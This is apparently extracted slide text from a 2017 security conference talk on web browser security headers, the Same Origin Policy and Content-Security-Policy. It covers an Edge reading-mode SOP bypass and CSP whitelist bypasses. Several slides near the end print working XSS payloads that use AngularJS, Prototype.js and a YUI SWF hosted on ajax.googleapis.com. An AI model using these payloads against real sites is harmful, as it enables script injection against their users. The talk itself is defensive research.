SECUINSIDE 2017 Bypassing Web Browser Security Policies DongHyun Kim (hackpupu) Security Researcher at i2sec Korea University Graduate School
Agenda - Me? - Abstract - What is HTTP Secure Header? - What is SOP(Same Origin Policy)? - SOP(Same Origin Policy) Bypass 1-Day - Details CSP(Content-Security-Policy) - CSP Bypass (Whitelist) - Conclusion
Me? - 김동현 (hackpupu) - 1995.02.13 - researcher@(c)i2sec - CTF, Web Hacking, Pentester - Scuba Diving, Sea - http://fb.com/hackpupu - http://hackpupu.github.io
Abstract Browser Hacking 중 Secure Header 에관한취약점을소개한다.
What is HTTP Secure Header? 어떠한 Response Header 가 Client Browser 에영향을줄수있는가? 옵션기능 Example Content-Security-Policy XSS 공격방지, 허용된 URL 에서만 Static Resource 허용 Content-Security-Policy: script-src self https://apis.google.com X-Frame-Options FRAME 을차단 / 설정된도메인만허용 X-Frame-Options: SAMDORIGIN or Deny or http://i2sec.co.kr/ X-Content-Type-Options MIME-Snffing 공격을차단 X-Content-Type-Options: nosniff Strict-Transport-Security HTTPS 로강제고정해연결 (MITM 공격차단 ) Strict-Transport-Security: max-age=1607400; includesubdomains Public-Key-Pins 인증서 PIN 을비교후연결 ( 위조된인증서확인 ) Public-Key-Pins: pin-sha256= <sha256> ; pin-sha256= <sha256> max-age= 15768000; includesubdomains X-XSS-Protection 브라우저의 XSS 필터를활성화 X-XSS-Protection: 1; mode-block
What is HTTP Secure Header? Github Response Header Example
What is SOP(Same Origin Policy)? Same Origin Policy Details - Example Example: http://seoul.i2sec.co.kr/index.html URL 결과 이유 http://seoul.i2sec.co.kr/secuinside/test.html 성공 http://seoul.i2sec.co.kr/education/main.html 성공 https://seoul.i2sec.co.kr/secure.html 실패 프로토콜상이 http://seoul.i2sec.co.kr:8080/etc.html 실패 포트상이 http://busan.i2sec.co.kr/etc.html 실패 호스트상이
What is SOP(Same Origin Policy)? Same Origin Policy Details - What is Origin? http:// seoul.i2sec.co.kr :8080 scheme hostname port Origin
What is SOP(Same Origin Policy)? Same Origin Policy Details - IE Except - Trust Zones: 두도메인이신뢰할수있는영역에속하면 SOP 가적용되지않는다. e.g., 기업도메인 (corporate domains) - Port: IE 는포트를비교하지않는다. http://seoul.i2sec.co.kr:8080/index.html = http://seoul.i2sec.co.kr:80/index.html
What is SOP(Same Origin Policy)? Same Origin Policy Details - Inherited origins - about:blank, data: 또는 javascript: 와같은 URL 에서는 URL 자체가원본에대한정보를제공하지않기에, 위 URL 을호출한문서의정책을상속한다. http://seoul.i2sec.co.kr about:blank Origin: seoul.i2sec.co.kr data: javascript:
What is SOP(Same Origin Policy)? Edge Browser SOP Bypass Using Reading Mode - ALL Source Code In hackpupu github - https://github.com/hackpupu/papaer/2017/secuinside/demo_sop
SOP(Same Origin Policy) Bypass 1-Day Edge Browser SOP Bypass Using Reading Mode Read Mode ON
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details http://secuinside.org/2017/ctf.html Read Mode ON Original HTML Read Mode HTML
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details Read Mode ON Deleted Tags <script> <hr> <section> <footer> <li> <header> <nav> <article> <ul> Read Mode Deleted Tags (e.g, secuinside.org/2017/ctf.html)
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details http://secuinside.org/2017/ctf.html
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details read:http://secuinside.org/2017/ctf.html
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Conclusion Edge CSS File is Internal File Using C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\ReadingView Edge Read mode Delete Tags(Script, Iframe, etc html tags ) Loading in the background, without the user knowing
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 http://secuinside.org
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 read:http://secuinside.org
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 Finding Interesting Redirect URL
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 Not Changed location.href and URL Bar
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#2 Object Tag Write Available <object data="http://www.i2sec.co.kr/secuinside/data.js"></object> http://www.i2sec.co.kr/secuinside/data.js
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#3 document.write data, top location using! <object data="http://www.i2sec.co.kr/secuinside/data.js "></object> http://www.i2sec.co.kr/secuinside/data.js
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability Conclusion Using Edge Read Mode Redirect, Not Change URL Bar and location.href value Edge Read Mode not deleted object tag Edge Read Mode document.write
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Demo SOP Bypass 1-Day DEMO
CSP(Content-Security-Policy) Details CSP Options Content-Security-Policy: script-src 'self' https://apis.google.com Access-Allow Resource Type Another Domain Origin (Using Domain)
CSP(Content-Security-Policy) Details CSP Options - Access-Allow Resource Type 옵션기능 Example Domain base-uri <base> 태그에나타낼수있는 URL 을제한 child-src Frame 태그에나타낼수있는 URL 을제한 child-src https://youtube.com connect-src XHR, WebSocket 또는 EventSource 를통해연결하는출처를제한 font-src 웹폰트를제공할수있는출처를제한 font-src https://themes.googleusercontent.com form-action img-src media-src <form> 태그내 action 의 Endpoint 를제한 이미지를로드할수있는출처를제한 동영상및오디오를로드할수있는출처를제한 style-src 스타일시트 (CSS) 를로드할수있는출처를제한 style-src https://www.bootstrapcdn.com/
CSP(Content-Security-Policy) Details CSP Options - Another Tip - Content Security Policy (CSP) block eval method call - CSP is block using eval() for Javascript - CSP does not specify unsafe-inline, the inline event handler is blocked
CSP(Content-Security-Policy) Details Why Attacker Thinking CSP? Drive By Download Attack hacker_site/hack.js Victim Site Include(hacker_site/hack.js) User Browser
CSP(Content-Security-Policy) Details Why Attacker Thinking CSP? - Enable CSP Drive By Download Attack hacker_site/hack.js Victim Site Include(hacker_site/hack.js) User Browser
CSP(Bypass) Bypass CSP(Bypass) Example, Edge 0-Day and CSP WhiteListDomain - ALL Source Code In hackpupu github - https://github.com/hackpupu/papaer/2017/secuinside/demo_csp
CSP(Bypass) Edge Bypass application/pdf not filtering - Demo <embed type="application/pdf" src="http://www.africau.edu/images/default/sample.pdf" width="800" height="500">
CSP(Content-Security-Policy) Details CSP is Real Safe? Content-Security-Policy: script-src self ajax.googleapis.com
CSP Bypass (Whitelist) CSP bypass XSS Challenge https://github.com/cure53/xsschallengewiki/wiki/h5sc-minichallenge-3:- %22Sh*t,-it%27s-CSP!%22
CSP Bypass (Whitelist) CSP bypass Using AngularJS ng-csp Options ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></ script>
CSP Bypass (Whitelist) CSP bypass Using Google Externallinterface XSS "><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/asse ts/charts.swf?alloweddomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
CSP Bypass (Whitelist) CSP bypass Using AngularJS + Prototype.js "ng-app ng-csp><base href=//ajax.googleapis.com/ajax/libs/><script src=angularjs/1.0.1/angular.js></script><script src=prototype/1.7.2.0/prototype.js></script>{{$on.curry.call().aler t(1337
CSP Bypass (Whitelist) CSP bypass DEMO(ajax.googleapis.com)
Conclusion - 브라우저별보안헤더 / 정책을적용한방법은다다르다. - 헤더를안전하게적용했다고생각하지만취약점은존재한다! - SOP, CSP 등은재미나게우회할아이디어가많다. - 기능이새로추가되는 Third-Party 도보면참재미지다. - CDN과 AngularJS 샌드박스를 100% 신뢰하지말라
0-day IE11! from James Lee - ALL Source Code In hackpupu github - https://github.com/hackpupu/papaer/2017/secuinside/0_day
0-Day IE11! from James Lee MS IE11 Information Disclosure, Content Spoofing, etc https://ineedthinkpad.blogspot.kr/2017/05/msie11.html https://github.com/hackpupu/paper/2017/secuinside/demo/ie11
Thank you :) - Reference https://tools.ietf.org/html/rfc6797 https://developer.mozilla.org/en- US/docs/Web/Security/HTTP_strict_transport_security https://www.brokenbrowser.com/sop-bypass-abusing-read-protocol/ https://github.com/cure53/xsschallengewiki/wiki/h5sc- Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22 https://ineedthinkpad.blogspot.kr/2017/05/msie11.html